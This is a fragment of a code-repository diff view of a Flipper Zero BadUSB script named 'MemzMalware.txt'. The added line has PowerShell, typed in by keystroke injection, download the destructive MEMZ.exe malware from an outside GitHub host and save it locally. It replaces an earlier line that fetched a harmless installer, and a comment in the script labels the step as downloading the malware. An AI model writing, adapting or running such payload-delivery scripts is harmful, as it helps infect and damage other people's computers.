🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/MemzMalware.txt
    skipped 23 lines
    24 24  ENTER
    25 25  DELAY 500
    26 26  REM Basically downloads the MEMZ.exe malware
    27  -STRING $webClient = New-Object System.Net.WebClient; $webClient.DownloadFile("https://github.com/ShareX/ShareX/releases/download/v13.1.0/ShareX-13.1.0-setup.exe", "$Path\MEMZ.exe")
     27 +STRING $webClient = New-Object System.Net.WebClient; $webClient.DownloadFile("https://github.com/vvinlind/MEMZ/blob/master/MEMZ.exe", "$Path\MEMZ.exe")
    28 28  DELAY 200
    29 29  ENTER
    30 30  DELAY 500
    skipped 9 lines
Please wait...
Page is in error, reload to recover